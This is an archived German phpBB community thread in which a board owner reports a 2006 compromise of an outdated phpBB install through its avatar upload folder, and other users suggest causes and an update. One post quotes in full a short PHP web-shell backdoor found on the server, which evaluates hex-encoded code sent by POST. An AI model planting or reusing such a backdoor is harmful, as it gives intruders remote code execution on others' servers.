phpBB.de

phpBB.de - Die deutsche phpBB-Community
https://www.phpbb.de/community/

Hacker Angriff

https://www.phpbb.de/community/viewtopic.php?t=137884

Seite 1 von 1

Hacker Angriff

Verfasst: 13.12.2006 15:52
von Fanti
Hallo Leute.

Ich hatte bis vor ein paar Tagen Board Version 16 laufen.
Ich habe den Avatar ordner auf die Rechte 777 gestellt. In dem Ordner schwirren plötzlich php dateien herum. Mit diesen hat dann ein Hacker einen ddos Angriff gemacht. Gibt oder gab es in den letzten Versionen von phpbb einen Bug, mit dem es möglich war, php bzw. zip dateien auf den Server zu laden?

MfG

Fanti

Re: Hacker Angriff

Verfasst: 13.12.2006 16:34
von Fähnchen
Fanti hat geschrieben:Ich hatte bis vor ein paar Tagen Board Version 16 laufen.
:o Dann brauchst du dich nicht wundern wenn bekannte Lücken ausgenutzt werden. Mit 2.0.18 wurde einiges gefixt und produktiv einsetzen sollte man sowieso nur Version 2.0.21. Ein Verzeichnis mit CHMOD 777 stellt immer ein Risiko dar.

Kannst du denn inzwischen sagen wie der Täter geschafft hat die PHP-Dateien hochzuladen?

Vielleicht sogar über die Avatar-Upload-Funktion selber. Auch in admin/db_utilities gab es eine Lücke. Ich kann mich da so dunkel an etwas erinnern dass das möglich war. Da müsste ich aber erst selber recherchieren um genaueres sagen zu können.

Verfasst: 13.12.2006 16:41
von Fanti
Es ist ganz komisch gewesen. Im Ordner images/avatar war eine php datei mit folgendem Code:

Code: Alles auswählen

<?php

if(isset($HTTP_POST_VARS) && isset($HTTP_POST_VARS['ixjabgre']))
{
	eval(pack('H*', $HTTP_POST_VARS['ixjabgre']));
}
else if(isset($_POST) && isset($_POST['ixjabgre']))
{
	eval(pack('H*', $_POST['ixjabgre']));
}

?>
Was der genau macht, kann mir sicher ein PHP Experte hier sagen.

Dann war ein Unterordner .X indem lag eine zipdatei .zip.

diese war in den ordner . entpackt. dort lag ein irc bot drinnen.

dann hab ich noch im phpbb verzeichnis einen ordner auto_backup. indem lag genau die selbe php datei wie oben. das ist für mich das wundersame, wie die auch hier hin kam.
der ddos angriff stammte wahrscheinlich aus dem avatar ordner, ist aber noch nicht so ganz sicher.

Verfasst: 13.12.2006 17:58
von Fähnchen
pack und eval() oder auch vordefinierte Variablen - insbesondere $HTTP_POST_VARS
if und else sind nur einfache Kontrollstrukturen (wenn ... dann ... sonst)

Nun kannst du dir sicher auch denken dass dein Script wohlmöglich böse Absichten verfolgt. Wie das auf deinen Server gekommen ist kann ich allerdings nicht erklären.

Ich hoffe du hast es inzwischen vom Server entfernt und denkst an ein Update deines Forums.

Verfasst: 13.12.2006 19:59
von Fanti
Update habe ich gestern gemacht. Das ding muss per Avatarupload raufgekommen sein. Wahrscheinlcih ein Bug vom PHPBB. Danach hat der Hacker den eggdrop installiert und den server als hackingconsole mißbraucht. von august bis heute morgen.

Hier kannst mal sehen was die group so macht:

- Link entfernt -

Verfasst: 13.12.2006 20:15
von Fähnchen
Vielleicht könnte dieses Thema noch interessant für dich sein:
http://www.phpbb.de/viewtopic.php?t=120661
Wahrscheinlcih ein Bug vom PHPBB
Sehr gut möglich, gerade wenn man eine veraltete Version benutzt.
Alle Zeiten sind UTC+01:00
Seite 1 von 1

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de